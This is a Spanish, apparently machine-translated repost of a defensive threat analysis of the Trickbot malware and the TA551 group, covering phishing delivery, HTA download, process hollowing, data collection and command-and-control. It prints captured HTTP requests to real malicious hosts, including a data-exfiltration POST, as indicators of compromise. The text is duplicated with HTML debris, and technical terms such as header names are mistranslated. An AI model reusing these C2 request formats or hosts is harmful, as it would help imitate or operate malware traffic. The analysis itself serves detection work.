Hoy en d\u00eda, ya no estamos lidiando con virus caseros ensamblados de manera aproximada. El malware es una industria, y los desarrolladores profesionales intercambian, ya sea robando el c\u00f3digo de uno o colaborando deliberadamente. Los ataques son de m\u00faltiples capas en estos d\u00edas, con diversas aplicaciones de software sofisticadas que se encargan de diferentes trabajos a lo largo de la cadena de ataque, desde el compromiso inicial hasta la filtraci\u00f3n o el cifrado de datos final. Las herramientas espec\u00edficas para cada etapa son altamente especializadas y, a menudo, se pueden alquilar como un servicio, incluida la atenci\u00f3n al cliente y los modelos de suscripci\u00f3n para (ab)uso profesional. Obviamente, esto ha aumentado en gran medida tanto la disponibilidad como la efectividad potencial y el impacto del malware. \u00bfSuena aterrador? <\/p>\n
Bueno, s\u00ed, pero la aparente profesionalizaci\u00f3n en realidad tambi\u00e9n tiene algunos aspectos positivos. Un factor es que ciertos m\u00f3dulos reutilizados que se encuentran com\u00fanmente en el malware se pueden usar para identificar, rastrear y analizar el software de ataque profesional. En \u00faltima instancia, esto significa que, con suficiente experiencia, los analistas capacitados pueden detectar y detener el malware en su camino, a menudo con un da\u00f1o m\u00ednimo o nulo (si los atacantes logran atravesar las primeras l\u00edneas de defensa).<\/p>\n
Veamos esta mec\u00e1nica en acci\u00f3n mientras seguimos a un analista real de CyberSOC que investiga el caso del malware denominado “Trickbot”.<\/p>\n
Or\u00edgenes de Trickbot<\/strong><\/h2>\nLos CyberSOC de Orange Cyberdefense han estado rastreando el malware espec\u00edfico llamado Trickbot durante bastante tiempo. Se suele atribuir a un Threat Actor espec\u00edfico generalmente conocido con el nombre de Wizard Spider (Crowdstrike), UNC1778 (FireEye) o Gold Blackburn (Secureworks).<\/p>\n
Trickbot es un troyano popular y modular que se us\u00f3 inicialmente para apuntar a la industria bancaria y que, mientras tanto, tambi\u00e9n se us\u00f3 para comprometer a empresas de otras industrias. Ofrece varios tipos de cargas \u00fatiles. Trickbot evolucion\u00f3 progresivamente para ser utilizado como Malware-as-a-Service (MaaS) por diferentes grupos de ataque.<\/p>\n
Se sabe que el actor de amenazas detr\u00e1s de esto act\u00faa r\u00e1pidamente, utilizando la conocida herramienta posterior a la explotaci\u00f3n Cobalt Strike para moverse lateralmente en la infraestructura de red de la empresa e implementar ransomware como Ryuk o Conti como etapa final. Dado que se utiliza para el acceso inicial, ser capaz de detectar esta amenaza lo m\u00e1s r\u00e1pido posible es un elemento clave del \u00e9xito para prevenir nuevos ataques.<\/p>\n
Este an\u00e1lisis de amenazas se centrar\u00e1 en el actor de amenazas llamado TA551 y su uso de Trickbot como ejemplo. Presentar\u00e9 c\u00f3mo podemos realizar la detecci\u00f3n en los diferentes pasos de la cadena de eliminaci\u00f3n, comenzando desde la infecci\u00f3n inicial a trav\u00e9s de campa\u00f1as de malspam, pasando a la detecci\u00f3n de herramientas utilizadas por el actor de amenazas durante el compromiso. Tambi\u00e9n proporcionaremos informaci\u00f3n adicional sobre c\u00f3mo el actor de amenazas est\u00e1 usando este malware y la evoluci\u00f3n que tom\u00f3.<\/p>\n
1 <\/strong>\u2014 Acceso inicial<\/strong><\/h4>\n\n<\/ol>\nDesde junio de 2021, el grupo TA551 comenz\u00f3 a entregar el malware Trickbot utilizando un zip encriptado. El pretexto del correo electr\u00f3nico imita una informaci\u00f3n importante para reducir la vigilancia del usuario.<\/p>\n
El archivo adjunto incluye un archivo .zip que nuevamente incluye un documento. El archivo zip siempre usa el mismo nombre que “request.zip” o “info.zip”, y el mismo nombre para el archivo del documento.<\/p>\n
NB: The Threat Actor us\u00f3 el mismo modus operandi antes\/en paralelo a Trickbot para entregar otro malware. Observamos durante el mismo per\u00edodo, de junio de 2021 a septiembre de 2021, el uso de Bazarloader en la carga \u00fatil de acceso inicial.<\/i><\/p>\n2 <\/strong>\u2014 Ejecuci\u00f3n<\/strong><\/h4>\n\n<\/ol>\nCuando el usuario abre el documento con las macros habilitadas, se colocar\u00e1 un archivo HTA en el sistema y se iniciar\u00e1 mediante cmd.exe. El archivo HTA se utiliza para descargar la DLL de Trickbot desde un servidor remoto.<\/p>\n
Este comportamiento est\u00e1 relacionado con TA551, podemos identificarlo con el patr\u00f3n “\/bdfh\/” en la solicitud GET.<\/p>\n
\nOBTENER \/bdfh\/M8v[..]VUB HTTP\/1.1<\/i><\/p>\n
Aceptar: *\/*<\/i><\/p>\n
Anfitri\u00f3n: wilkinstransportss.com<\/i><\/p>\n
Tipo de contenido: aplicaci\u00f3n\/flujo de octetos<\/i><\/p>\n<\/blockquote>\n
NB: Los patrones relacionados con TA551 evolucionaron con el tiempo, desde mediados de agosto de 2021, el patr\u00f3n cambi\u00f3 a “\/bmdff\/”. La DLL se registra como un archivo jpg para ocultar la extensi\u00f3n real e intenta ejecutarse a trav\u00e9s de regsvr32.exe. Luego, Trickbot se inyectar\u00e1 en “wermgr.exe” utilizando t\u00e9cnicas de Process Hollowing.<\/p>\n
\n\n\n![\"\"](\"https:\/\/teknomers.com\/es\/wp-content\/uploads\/2022\/05\/1653430594_744_Analisis-de-malware-Trickbot.jpg\")
<\/td>\n<\/tr>\n \nFigura 1 – Ejecuci\u00f3n de Trickbot en el sandbox<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n3 <\/strong>\u2014 Recopilaci\u00f3n<\/strong><\/h4>\n\n<\/ol>\nDespu\u00e9s del compromiso inicial exitoso del sistema, Trickbot puede recopilar mucha informaci\u00f3n sobre su objetivo utilizando ejecutables leg\u00edtimos de Windows e identificar si el sistema es miembro de un dominio de Active Directory. <\/p>\n
Adem\u00e1s, para esta colecci\u00f3n, Trickbot escanear\u00e1 m\u00e1s informaci\u00f3n como la compilaci\u00f3n de Windows, la direcci\u00f3n IP p\u00fablica, el usuario que ejecuta Trickbot y tambi\u00e9n si el sistema est\u00e1 detr\u00e1s de un firewall NAT.<\/p>\n
Trickbot tambi\u00e9n puede recopilar informaci\u00f3n confidencial, como datos bancarios o credenciales, y filtrarla a un servidor de comando y control dedicado (C2).<\/p>\n
4 <\/strong>\u2014 Comando y Control<\/strong><\/h4>\n\n<\/ol>\nCuando el sistema est\u00e1 infectado, puede contactar varios tipos de Trickbot C2. El C2 principal es con el que se comunicar\u00e1 el sistema v\u00edctima, principalmente para recibir nuevas instrucciones.<\/p>\n
Todas las solicitudes a un Trickbot C2 usan el siguiente formato:<\/p>\n
\n“\/\/\/\/<adicional <\/p>\n
informaci\u00f3n sobre el comando>\/”<\/p>\n<\/blockquote>\n
\nOBTENGA \/zev4\/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787\/0\/Windows 10 x64\/1108\/XX.XX.XX.XX\/38245433F0E3D5689F6EE84483106F4385CC92EAFAD<\/i><\/p>\n
6571D97A519A2EF29\/0bqjxzSOQUSLPRJMQSWKDHTHKEG\/ HTTP\/1.1<\/i><\/p>\n
Conexi\u00f3n: Keep-Alive<\/i><\/p>\n
Agente de usuario: curl\/7.74.0<\/i><\/p>\n
Anfitri\u00f3n: 202.165.47.106<\/i><\/p><\/blockquote>\n
Todos los datos recopilados se env\u00edan a un Trickbot C2 de Exfiltraci\u00f3n independiente mediante m\u00e9todos de solicitud HTTP POST. El formato de solicitud se mantiene igual, pero el comando “90” es espec\u00edfico para la exfiltraci\u00f3n de datos, m\u00e1s precisamente, los datos del sistema recopilados del sistema infectado.<\/p>\n
\nPOST \/zev4\/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787\/90\/HTTP\/1.1<\/i><\/p>\n
Conexi\u00f3n: Keep-Alive<\/i><\/p>\n
Tipo de contenido: multipart\/form-data; l\u00edmite=——L\u00edmite<\/i><\/p>\n
ary0F79C562<\/i><\/p>\n
Agente de usuario: Fantasma<\/i><\/p>\n
Anfitri\u00f3n: 24.242.237.172:443<\/i><\/p>\n<\/blockquote>\nAtaques de seguimiento: Cobalt Strike, Ryuk, Conti<\/strong><\/h2>\nGolpe de cobalto[1] es una herramienta comercial de acceso remoto con todas las funciones que se autodenomina “software de simulaci\u00f3n de adversarios dise\u00f1ado para ejecutar ataques dirigidos y emular las acciones posteriores a la explotaci\u00f3n de actores de amenazas avanzadas”. Las capacidades interactivas posteriores a la explotaci\u00f3n de Cobalt Strike cubren la gama completa de t\u00e1cticas ATT&CK, todas ejecutadas dentro de un \u00fanico sistema integrado.<\/p>\n
En nuestro contexto, Trickbot utiliza el proceso wermgr.exe secuestrado para cargar una baliza Cobalt Strike en la memoria.<\/p>\n
Varios operadores de ransomware tambi\u00e9n est\u00e1n afiliados a los actores de amenazas. El objetivo de Trickbot es realizar el acceso inicial que precede al ataque real del ransomware. Conti y Ryuk son los principales ransomwares observados en la etapa final de las infecciones de Trickbot, aunque no son los \u00fanicos. Conti es un grupo que opera un modelo de Ransomware-as-a-Service y est\u00e1 disponible para varios actores de amenazas afiliados. Ryuk, por otro lado, es un ransomware que est\u00e1 vinculado directamente al actor de amenazas detr\u00e1s de Trickbot.<\/p>\n
Aprendizajes clave<\/strong><\/h2>\nLos actores de amenazas a menudo todav\u00eda usan t\u00e9cnicas b\u00e1sicas para ingresar a la red, como correos electr\u00f3nicos de phishing. Crear conciencia sobre el phishing es definitivamente un gran primer paso para desarrollar la resiliencia cibern\u00e9tica. Los mejores ataques son, despu\u00e9s de todo, los que ni siquiera comienzan.<\/p>\n
Por supuesto, no existe tal cosa como una protecci\u00f3n preventiva a prueba de balas en cibern\u00e9tica. Es a\u00fan m\u00e1s importante tener la capacidad de detectar Trickbot en una etapa temprana. Aunque la cadena de ataque se puede romper en cada etapa del camino: cuanto m\u00e1s tarde, mayor ser\u00e1 el riesgo de compromiso total y el da\u00f1o resultante. Trickbot es utilizado por diferentes actores de amenazas, pero el enfoque de detecci\u00f3n sigue siendo el mismo en la mayor\u00eda de sus etapas espec\u00edficas. Aqu\u00ed se explican algunos de los indicadores de compromiso. Pero el malware tambi\u00e9n recibe actualizaciones. <\/p>\n
Los analistas deben permanecer alerta. Rastrear y observar un malware espec\u00edfico o un actor de amenazas es clave para seguir su evoluci\u00f3n, mejora y mantenerse actualizado sobre una detecci\u00f3n eficiente de la amenaza.<\/p>\n
Esta es una historia de las trincheras encontradas en el Navegador de seguridad<\/a>. All\u00ed tambi\u00e9n se pueden encontrar m\u00e1s an\u00e1lisis de malware y otras cosas interesantes, incluidos relatos de operaciones de respuesta de emergencia y la visi\u00f3n de un cient\u00edfico criminalista sobre la extorsi\u00f3n cibern\u00e9tica, as\u00ed como toneladas de hechos y cifras sobre el panorama de la seguridad en general. El informe completo est\u00e1 disponible para su descarga en el sitio web de Orange Cyberdefense, as\u00ed que eche un vistazo. \u00a1Vale la pena!<\/p>\n[1] MITRE ATT&CK Golpe de cobalto: https:\/\/attack.mitre.org\/software\/S0154\/<\/a><\/i><\/p>\n
- \n<\/ol>\n
Desde junio de 2021, el grupo TA551 comenz\u00f3 a entregar el malware Trickbot utilizando un zip encriptado. El pretexto del correo electr\u00f3nico imita una informaci\u00f3n importante para reducir la vigilancia del usuario.<\/p>\n
El archivo adjunto incluye un archivo .zip que nuevamente incluye un documento. El archivo zip siempre usa el mismo nombre que “request.zip” o “info.zip”, y el mismo nombre para el archivo del documento.<\/p>\n
NB: The Threat Actor us\u00f3 el mismo modus operandi antes\/en paralelo a Trickbot para entregar otro malware. Observamos durante el mismo per\u00edodo, de junio de 2021 a septiembre de 2021, el uso de Bazarloader en la carga \u00fatil de acceso inicial.<\/i><\/p>\n Cuando el usuario abre el documento con las macros habilitadas, se colocar\u00e1 un archivo HTA en el sistema y se iniciar\u00e1 mediante cmd.exe. El archivo HTA se utiliza para descargar la DLL de Trickbot desde un servidor remoto.<\/p>\n Este comportamiento est\u00e1 relacionado con TA551, podemos identificarlo con el patr\u00f3n “\/bdfh\/” en la solicitud GET.<\/p>\n OBTENER \/bdfh\/M8v[..]VUB HTTP\/1.1<\/i><\/p>\n Aceptar: *\/*<\/i><\/p>\n Anfitri\u00f3n: wilkinstransportss.com<\/i><\/p>\n Tipo de contenido: aplicaci\u00f3n\/flujo de octetos<\/i><\/p>\n<\/blockquote>\n NB: Los patrones relacionados con TA551 evolucionaron con el tiempo, desde mediados de agosto de 2021, el patr\u00f3n cambi\u00f3 a “\/bmdff\/”. La DLL se registra como un archivo jpg para ocultar la extensi\u00f3n real e intenta ejecutarse a trav\u00e9s de regsvr32.exe. Luego, Trickbot se inyectar\u00e1 en “wermgr.exe” utilizando t\u00e9cnicas de Process Hollowing.<\/p>\n Despu\u00e9s del compromiso inicial exitoso del sistema, Trickbot puede recopilar mucha informaci\u00f3n sobre su objetivo utilizando ejecutables leg\u00edtimos de Windows e identificar si el sistema es miembro de un dominio de Active Directory. <\/p>\n Adem\u00e1s, para esta colecci\u00f3n, Trickbot escanear\u00e1 m\u00e1s informaci\u00f3n como la compilaci\u00f3n de Windows, la direcci\u00f3n IP p\u00fablica, el usuario que ejecuta Trickbot y tambi\u00e9n si el sistema est\u00e1 detr\u00e1s de un firewall NAT.<\/p>\n Trickbot tambi\u00e9n puede recopilar informaci\u00f3n confidencial, como datos bancarios o credenciales, y filtrarla a un servidor de comando y control dedicado (C2).<\/p>\n Cuando el sistema est\u00e1 infectado, puede contactar varios tipos de Trickbot C2. El C2 principal es con el que se comunicar\u00e1 el sistema v\u00edctima, principalmente para recibir nuevas instrucciones.<\/p>\n Todas las solicitudes a un Trickbot C2 usan el siguiente formato:<\/p>\n “\/\/\/\/<adicional <\/p>\n informaci\u00f3n sobre el comando>\/”<\/p>\n<\/blockquote>\n OBTENGA \/zev4\/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787\/0\/Windows 10 x64\/1108\/XX.XX.XX.XX\/38245433F0E3D5689F6EE84483106F4385CC92EAFAD<\/i><\/p>\n 6571D97A519A2EF29\/0bqjxzSOQUSLPRJMQSWKDHTHKEG\/ HTTP\/1.1<\/i><\/p>\n Conexi\u00f3n: Keep-Alive<\/i><\/p>\n Agente de usuario: curl\/7.74.0<\/i><\/p>\n Anfitri\u00f3n: 202.165.47.106<\/i><\/p><\/blockquote>\n Todos los datos recopilados se env\u00edan a un Trickbot C2 de Exfiltraci\u00f3n independiente mediante m\u00e9todos de solicitud HTTP POST. El formato de solicitud se mantiene igual, pero el comando “90” es espec\u00edfico para la exfiltraci\u00f3n de datos, m\u00e1s precisamente, los datos del sistema recopilados del sistema infectado.<\/p>\n POST \/zev4\/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787\/90\/HTTP\/1.1<\/i><\/p>\n Conexi\u00f3n: Keep-Alive<\/i><\/p>\n Tipo de contenido: multipart\/form-data; l\u00edmite=——L\u00edmite<\/i><\/p>\n ary0F79C562<\/i><\/p>\n Agente de usuario: Fantasma<\/i><\/p>\n Anfitri\u00f3n: 24.242.237.172:443<\/i><\/p>\n<\/blockquote>\n Golpe de cobalto[1] es una herramienta comercial de acceso remoto con todas las funciones que se autodenomina “software de simulaci\u00f3n de adversarios dise\u00f1ado para ejecutar ataques dirigidos y emular las acciones posteriores a la explotaci\u00f3n de actores de amenazas avanzadas”. Las capacidades interactivas posteriores a la explotaci\u00f3n de Cobalt Strike cubren la gama completa de t\u00e1cticas ATT&CK, todas ejecutadas dentro de un \u00fanico sistema integrado.<\/p>\n En nuestro contexto, Trickbot utiliza el proceso wermgr.exe secuestrado para cargar una baliza Cobalt Strike en la memoria.<\/p>\n Varios operadores de ransomware tambi\u00e9n est\u00e1n afiliados a los actores de amenazas. El objetivo de Trickbot es realizar el acceso inicial que precede al ataque real del ransomware. Conti y Ryuk son los principales ransomwares observados en la etapa final de las infecciones de Trickbot, aunque no son los \u00fanicos. Conti es un grupo que opera un modelo de Ransomware-as-a-Service y est\u00e1 disponible para varios actores de amenazas afiliados. Ryuk, por otro lado, es un ransomware que est\u00e1 vinculado directamente al actor de amenazas detr\u00e1s de Trickbot.<\/p>\n Los actores de amenazas a menudo todav\u00eda usan t\u00e9cnicas b\u00e1sicas para ingresar a la red, como correos electr\u00f3nicos de phishing. Crear conciencia sobre el phishing es definitivamente un gran primer paso para desarrollar la resiliencia cibern\u00e9tica. Los mejores ataques son, despu\u00e9s de todo, los que ni siquiera comienzan.<\/p>\n Por supuesto, no existe tal cosa como una protecci\u00f3n preventiva a prueba de balas en cibern\u00e9tica. Es a\u00fan m\u00e1s importante tener la capacidad de detectar Trickbot en una etapa temprana. Aunque la cadena de ataque se puede romper en cada etapa del camino: cuanto m\u00e1s tarde, mayor ser\u00e1 el riesgo de compromiso total y el da\u00f1o resultante. Trickbot es utilizado por diferentes actores de amenazas, pero el enfoque de detecci\u00f3n sigue siendo el mismo en la mayor\u00eda de sus etapas espec\u00edficas. Aqu\u00ed se explican algunos de los indicadores de compromiso. Pero el malware tambi\u00e9n recibe actualizaciones. <\/p>\n Los analistas deben permanecer alerta. Rastrear y observar un malware espec\u00edfico o un actor de amenazas es clave para seguir su evoluci\u00f3n, mejora y mantenerse actualizado sobre una detecci\u00f3n eficiente de la amenaza.<\/p>\n Esta es una historia de las trincheras encontradas en el Navegador de seguridad<\/a>. All\u00ed tambi\u00e9n se pueden encontrar m\u00e1s an\u00e1lisis de malware y otras cosas interesantes, incluidos relatos de operaciones de respuesta de emergencia y la visi\u00f3n de un cient\u00edfico criminalista sobre la extorsi\u00f3n cibern\u00e9tica, as\u00ed como toneladas de hechos y cifras sobre el panorama de la seguridad en general. El informe completo est\u00e1 disponible para su descarga en el sitio web de Orange Cyberdefense, as\u00ed que eche un vistazo. \u00a1Vale la pena!<\/p>\n [1] MITRE ATT&CK Golpe de cobalto: https:\/\/attack.mitre.org\/software\/S0154\/<\/a><\/i><\/p>\n2 <\/strong>\u2014 Ejecuci\u00f3n<\/strong><\/h4>\n
\n<\/ol>\n
\n
\n\n
\n <\/td>\n<\/tr>\n\n Figura 1 – Ejecuci\u00f3n de Trickbot en el sandbox<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n 3 <\/strong>\u2014 Recopilaci\u00f3n<\/strong><\/h4>\n
\n<\/ol>\n
4 <\/strong>\u2014 Comando y Control<\/strong><\/h4>\n
\n<\/ol>\n
\n
\n
\n
Ataques de seguimiento: Cobalt Strike, Ryuk, Conti<\/strong><\/h2>\n
Aprendizajes clave<\/strong><\/h2>\n